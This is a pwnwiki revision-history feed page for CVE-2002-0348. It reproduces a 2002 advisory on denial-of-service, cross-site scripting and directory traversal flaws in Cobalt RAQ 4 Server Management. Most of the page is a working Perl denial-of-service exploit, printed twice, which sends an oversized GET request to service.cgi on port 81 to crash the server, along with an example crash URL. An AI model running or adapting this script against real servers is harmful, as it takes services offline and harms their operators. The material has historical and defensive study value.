https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2002-0348_Cobalt_RAQ_4_Server_%E6%BC%8F%E6%B4%9E
CVE-2002-0348 Cobalt RAQ 4 Server 漏洞 - Revision history
2026-04-09T04:50:19Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2002-0348_Cobalt_RAQ_4_Server_%E6%BC%8F%E6%B4%9E&diff=802&oldid=prev
Pwnwiki: Created page with "==INFO== <pre> ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company..."
2021-03-31T07:17:50Z
<p>Created page with "==INFO== <pre> ------oOo---------------- Cobalt RAQ 4 Server Management, Cross Site Scripting , Directory Traversal & DoS Vulnerabilities. ------oOo---------------- Company..."</p>
<p><b>New page</b></p><div>==INFO==<br />
<pre><br />
------oOo----------------<br />
Cobalt RAQ 4 Server Management,<br />
Cross Site Scripting , Directory Traversal & DoS Vulnerabilities.<br />
------oOo----------------<br />
<br />
<br />
Company Affected: www.cobalt.com & www.sun.com<br />
Version: RAQ 4 Server Management.<br />
Dowload: http://www.cobalt.com/products/raq/index.html<br />
OS Affected: Linux ALL, Solaris ALL.<br />
<br />
<br />
Author:<br />
<br />
** Alex Hernandez <al3xhernandez@ureach.com><br />
** Thanks all the people from Spain and Argentina.<br />
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.<br />
<br />
<br />
----=[Brief Description]=------------<br />
<br />
Denial Of service. <br />
<br />
<br />
Proof Of concept:<br />
<br />
Server crashes after sending a very long URL:<br />
<br />
Example:<br />
<br />
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA<br />
<br />
<br />
Crash system and the admin need restart the service!.<br />
<br />
<br />
------oOo-------------<br />
Exploit Code DoS Cobalt4_DoS.pl<br />
------oOo-------------<br />
<br />
<br />
#!/usr/bin/perl<br />
#<br />
# Simple script to send a long 'A^s' command to the server, <br />
# resulting in the server crashing.<br />
#<br />
# Cobalt RAQ DoS v4 proof-of-concept exploit.<br />
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.<br />
#<br />
# Thanks all the people from Spain and Argentina.<br />
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.<br />
# <br />
#<br />
# Usage: perl -x Cobalt4_DoS.pl -s <server><br />
#<br />
# Example: <br />
#<br />
# perl -x Cobalt4_DoS.pl -s 10.0.0.1<br />
# <br />
# Crash was successful !<br />
#<br />
<br />
use Getopt::Std;<br />
use IO::Socket;<br />
<br />
print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");<br />
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");<br />
<br />
getopts('s:', \%args);<br />
if(!defined($args{s})){&usage;}<br />
<br />
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);<br />
<br />
$def = "A";<br />
$num = "100000";<br />
$data .= $def x $num;<br />
$serv = $args{s};<br />
$port = 81;#maybe u define the port for diference of versions<br />
$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data<br />
/HTTP/1.0\r\n\r\n";<br />
<br />
<br />
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");<br />
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");<br />
$proto = getprotobyname('tcp') || die("Error: $!\n");<br />
<br />
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");<br />
connect(S, $paddr) ||die ("Error: $!");<br />
select(S); $| = 1; select(STDOUT);<br />
print S "$buf";<br />
<br />
<br />
print("\nCrash was successful !\n\n");<br />
<br />
sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}<br />
<br />
<br />
------oOo------------------------------------<br />
Vendor Response:<br />
The vendor was notified<br />
<br />
Posted List^s Security cobalt:<br />
cobalt-security@list.cobalt.com &<br />
jlovell@sun.com<br />
<br />
http://www.cobalt.com<br />
Patch Temporary: <br />
Delete files cgi^s from the system, or disable its <br />
possible execution.<br />
<br />
Alex Hernandez <al3xhernandez@ureach.com> (c) 2002.<br />
<br />
------oOo------------------------------------<br />
</pre><br />
<br />
==Cobalt4_DoS.pl==<br />
<pre><br />
#!/usr/bin/perl<br />
#<br />
# Simple script to send a long 'A^s' command to the server, <br />
# resulting in the server crashing.<br />
#<br />
# Cobalt RAQ DoS v4 proof-of-concept exploit.<br />
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.<br />
#<br />
# Thanks all the people from Spain and Argentina.<br />
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.<br />
# <br />
#<br />
# Usage: perl -x Cobalt4_DoS.pl -s <server><br />
#<br />
# Example: <br />
#<br />
# perl -x Cobalt4_DoS.pl -s 10.0.0.1<br />
# <br />
# Crash was successful !<br />
#<br />
<br />
use Getopt::Std;<br />
use IO::Socket;<br />
<br />
print("\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\n");<br />
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");<br />
<br />
getopts('s:', \%args);<br />
if(!defined($args{s})){&usage;}<br />
<br />
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);<br />
<br />
$def = "A";<br />
$num = "100000";<br />
$data .= $def x $num;<br />
$serv = $args{s};<br />
$port = 81;#maybe u define the port for diference of versions<br />
$buf = "GET /cgi-bin/.cobalt/alert/service.cgi?service=$data<br />
/HTTP/1.0\r\n\r\n";<br />
<br />
<br />
$in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");<br />
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");<br />
$proto = getprotobyname('tcp') || die("Error: $!\n");<br />
<br />
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");<br />
connect(S, $paddr) ||die ("Error: $!");<br />
select(S); $| = 1; select(STDOUT);<br />
print S "$buf";<br />
<br />
<br />
print("\nCrash was successful !\n\n");<br />
<br />
sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");}<br />
<br />
</pre></div>
Pwnwiki